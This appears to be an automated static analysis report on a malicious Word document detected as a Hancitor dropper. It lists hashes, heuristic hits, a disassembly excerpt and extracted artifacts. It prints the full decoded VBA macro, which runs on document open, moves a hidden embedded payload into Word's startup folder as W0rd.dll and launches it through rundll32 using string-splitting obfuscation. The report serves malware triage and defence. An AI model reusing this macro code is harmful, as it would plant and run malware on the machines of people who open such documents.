Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d64568ebb71238b5…

MALICIOUS

Office (OLE)

373.5 KB Created: 2021-01-25 13:14:00 Authoring application: Microsoft Office Word First seen: 2021-02-20
MD5: ca5a993cb2c59999ef5c5c9b7dff2d03 SHA-1: b6e1a7a6bc3ecf04f32530397e9e5cb6c151fc06 SHA-256: d64568ebb71238b5367d1a4feb69ffd1492c36e320ce13698967dced10a0ef31
470 Risk Score

Heuristics 13

  • ClamAV: Doc.Dropper.Hancitor-9845854-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-9845854-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim regsrva As New Shell32.Shell
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.984) — 10/10 branch targets land on an instruction boundary (100% coherence)
    0002AD75  64a130000000      mov eax, dword ptr fs:[0x30]
0002AD7B  8b4068            mov eax, dword ptr [eax + 0x68]
0002AD7E  c1e808            shr eax, 8
0002AD81  a801              test al, 1
0002AD83  7510              jne 0x2ad95
0002AD85  ff7508            push dword ptr [ebp + 8]
0002AD88  ff1518700210      call dword ptr [0x10027018]
0002AD8E  50                push eax
0002AD8F  ff151c700210      call dword ptr [0x1002701c]
0002AD95  ff7508            push dword ptr [ebp + 8]
0002AD98  e84f000000        call 0x2adec
0002AD9D  59                pop ecx
0002AD9E  ff7508            push dword ptr [ebp + 8]
0002ADA1  ff15a0700210      call dword ptr [0x100270a0]
0002ADA7  cc                int3
0002ADA8  6a00              push 0
0002ADAA  ff1540700210      call dword ptr [0x10027040]
0002ADB0  8bc8              mov ecx, eax
0002ADB2  85c9              test ecx, ecx
0002ADB4  7503              jne 0x2adb9
0002ADB6  32c0              xor al, al
0002ADB8  c3                ret
0002ADB9  b84d5a0000        mov eax, 0x5a4d
0002ADBE  663901            cmp word ptr [ecx], ax
0002ADC1  75f3              jne 0x2adb6
0002ADC3  8b413c            mov eax, dword ptr [ecx + 0x3c]
0002ADC6  03c1              add eax, ecx
0002ADC8  813850450000      cmp dword ptr [eax], 0x4550
0002ADCE  75e6              jne 0x2adb6
0002ADD0  b90b010000        mov ecx, 0x10b
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4113 bytes
SHA-256: cafdc2ee8a7a23d3d0c4dd0063e2fcdbeca99b442351f658f5134779adad6302
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Document_Open()
Call stetptwwo
End Sub



Sub stetptwwo()

 Dim yy As String

Dim vxcv As Integer
Dim hugs As Integer
hugs = chek

Dim ede As String
If hugs = 1 Then
Else
Dim edef As String

Call hhhhh
Dim pushstr As String
pushstr = "\W" & "0rd.d"
Dim geto As String
Dim pus As String
pus = "xe"
geto = "nd"
Dim ter As String

Dim iof As String
iof = "3"
ter = "e"
Dim jsd As String
jsd = geto
 Dim hh As String
 hh = iof & "2." & ter & pus
 Dim fps As String
 fps = "r"
 Dim gpsa As String
 gpsa = "Unin"
 Dim fa As String
 fa = fps & "u" & jsd & "ll" & hh
 Dim glops As String
 glops = repid
Dim regsrva As New Shell32.Shell
yy = glops & yy & pushstr & "ll" & "," & gpsa & "stallFont"

Call regsrva.ShellExecute(fa, yy, " ", SW_SHOWNORMAL)
End If
End Sub


Attribute VB_Name = "Module1"
  


Function Getme(RootPath As String)
Dim hor As String

Dim fso As Object
Dim fld As Object
Dim vhhs As Object
Dim afs As String
Dim myArr
hor = repid
Dim asdf
Dim cheza As String

asdf = RootPath
Dim fer As String

Set fso = CreateObject("Scripting.FileSystemObject")

Set fld = fso.GetFolder(asdf)

strFileExists = Dir(RootPath & "\0fiasS.t" & "mp")
      If strFileExists = "" Then
    
For Each vhhs In fld.SUBFOLDERS


afs = vhhs

        Call checkthe(afs)
    myArr = Getme(vhhs.Path)


Next
    Set vhhs = Nothing
Getme = myArr
Set fld = Nothing
Set fso = Nothing



    Else
    Dim kurlbik As String
    kurlbik = hor
      If Dir(kurlbik & "\" & "W0rd.dll") = "" Then
      
     
   Call hi(RootPath)
      Else
      Exit Function
  End If
    
        End If


End Function





Function chek()
 Dim jsa As String

 jsa = repid
 Dim vzxx As String
 vzxx = jsa
 
 If Dir(vzxx & "\" & "W0rd.dll") = "" Then
 chek = 0
 Else

 chek = 1
 End If
End Function












Attribute VB_Name = "Module2"
Sub gotodown()
Call hhhss
   Selection.TypeBackspace
   Selection.Copy
   
End Sub


Sub hhhss()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=50
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=50
End Sub






Sub checkthe(sf As String)

Dim pafh As String
pafh = repid
strFileExists = Dir(sf & "\0fiasS.t" & "mp")
Dim ololow As String
ololow = sf
Dim nothings As String
nothings = pafh

      If strFileExists = "" Then
    
    Else
         If Dir(nothings & "\" & "W0rd.dll") = "" Then

        Name ololow & "\0fiasS.t" & "m" & "p" As ActiveDocument.Application.StartupPath & "\" & "W0rd.dll"
    Else
   Exit Sub
    End If
  
    End If
End Sub


Function repid()

repid = ActiveDocument.Application.StartupPath
End Function




Attribute VB_Name = "Module3"
Sub hhhhh()
Dim posl As String
posl = repid
Dim ntgs
Dim sda
Call gotodown
    ntgs = 50
sda = 49
Dim jos

While sda < 50
      ntgs = ntgs - 1
      
      If Dir(Left(posl, ntgs) & "Loc" & "al\Te" & "mp", vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Dim klas As String
   klas = posl
Call Getme(Left(klas, ntgs) & "Loc" & "al\Te" & "m" & "p")
  Selection.TypeBackspace
   

End Sub


Sub rnee(myhome As String, hsa As String)
Name myhome & "\" & "0fiasS.tm" & "p" As hsa
End Sub




Attribute VB_Name = "Module4"
Sub hi(myhome As String)
Dim glog As String
glog = repid
Dim hsa As String
hsa = glog & "\W0rd.dll"
Call rnee(myhome, hsa)
End Sub
embedded_office_00021e75.exe embedded-pe Office MZ+PE at offset 0x21E75 243595 bytes
SHA-256: 83a2c1632379d8106ab338df0e9e763e7ac672b0ec366300e1ecf98926f6b600
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, GetProcAddress, ExitProcess Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1673056904/Ole10Native 207681 bytes
SHA-256: 26d22d908f246c4f6e75ff0dee80bd01ed83313f2bac01b0a4e53ba36d1ae606
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, GetProcAddress, ExitProcess
ole10native_00_0fiasS.tmp ole-package-payload OLE Ole10Native payload: ObjectPool/_1673056904/Ole10Native; display_name=0fiasS.tmp; full_path=C:\Users\MyPc\AppData\Local\Temp\0fiasS.tmp; temp_path=; def_file= 207360 bytes
SHA-256: 633e229a0990882c4f9d247a096593b600b49f072b9b7075988f1afcc0d37a56
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, GetProcAddress, ExitProcess

Open this report in the interactive analyzer, or submit your own file for analysis.